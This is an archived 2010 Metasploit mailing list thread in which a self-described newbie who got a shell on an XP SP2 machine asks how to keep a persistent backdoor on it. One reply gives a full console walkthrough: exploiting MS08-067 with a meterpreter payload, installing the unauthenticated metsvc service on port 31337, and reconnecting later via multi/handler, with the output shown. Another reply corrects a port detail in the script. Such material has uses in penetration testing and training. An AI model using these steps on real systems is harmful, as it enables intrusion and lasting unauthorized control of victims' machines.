Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: newbie backdoor issue

From: Carlos Perez <carlos_perez () darkoperator com>
Date: Fri, 22 Jan 2010 18:52:20 -0400
Changing the rport in the script will not change the port in which the service will listen since this port in hardcoded 
in the service, if you look in the script this variable is only used for the creation of the multi/handler for 
connecting to the service and not for the installation of the service or it's configuration. 


Carlos 

On Jan 22, 2010, at 6:31 PM, troy () defendit com au wrote:


Edit metsvc.rb (/pentest/exploits/framework3/scripts/meterpreter) and
change rport value as needed.




nice troy ,

let me give a try n see how effective it is , also tell me can we use
common ports like 80,8080 etc to reconnect to target ..

--

Happiness is like a Butterfly...


--- On Fri, 22/1/10, troy () defendit com au <troy () defendit com au> wrote:

From: troy () defendit com au <troy () defendit com au>
Subject: Re: [framework] newbie backdoor issue
To: "SuNeEl" <seacore14 () yahoo com>
Cc: framework () spool metasploit com
Date: Friday, 22 January, 2010, 12:39 PM

Hi,

You could upload meterpreter and install as a service.

Eaxample:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.3:36842 -> 192.168.0.9:4444)


meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory
C:\WINDOWS\TEMP\iTImctYkkgUlqQ...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
* Starting service
Service metsvc successfully installed.

meterpreter>
To conenct back to host later:

Background session 2? [y/N]  y
msf exploit(ms08_067_netapi) > back

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.0.9
RHOST => 192.168.0.9

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 3 opened (192.168.0.3:49164 -> 192.168.0.9:31337)

meterpreter >
Background session 3? [y/N]
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  2   Meterpreter  192.168.0.3:41472 -> 192.168.0.9:4444
  3   Meterpreter  192.168.0.3:49164 -> 192.168.0.9:31337


Caution, the meterpreter listener doesn't require authentication, anybody
who can access the meterpreter port (in this cse 31337) could connect to
the target and gain system privs.







sorry if it seems odd in first look but..

tested on on target environment xp sp2 obtained shell..lol

but issue is how to set a permanent & presistance   backdoor so that I
can
connect same host when I wish to..

any suggestion or help appreciated
--

Happiness is like a Butterfly...



       The INTERNET now has a personality. YOURS! See your Yahoo!
Homepage.
http://in.yahoo.com/_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework







     The INTERNET now has a personality. YOURS! See your Yahoo! Homepage.
http://in.yahoo.com/



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: